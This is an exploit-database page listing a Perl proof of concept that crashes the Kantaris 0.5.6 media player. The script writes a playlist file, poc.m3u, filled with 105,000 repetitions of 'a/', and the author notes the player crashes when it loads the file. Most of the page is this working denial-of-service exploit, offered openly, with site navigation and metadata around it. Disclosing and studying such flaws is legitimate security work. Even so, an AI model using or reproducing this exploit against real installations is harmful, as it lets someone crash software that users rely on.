[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Kantaris 0.5.6 local Denial of service Poc

Author
73o
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-9931
Category
dos / poc
Date add
07-01-2010
Platform
unsorted
==========================================
Kantaris 0.5.6 local Denial of service Poc
==========================================

#!/usr/bin/perl
#Kantaris 0.5.6 local Denial of service Poc
#
#How i find this bug: I was looking for mkv player because i downloaded 13 seasons
#of south park. I found Kantaris player and decided to chek it's security.
#
#
#Bug info:Kantaris 0.5.6 crashes while loading poc playlist.Loading  that kind of playlist
#should be possible and is possible on other media players.
#
#
#Here is Proof on concept.........
  
  
$file="poc.m3u";
$poc='a/' x 105000;
open(myfile,">>$file");
print myfile $poc;
close(myfile);
print "Finished\n";




#  0day.today [2024-12-25]  #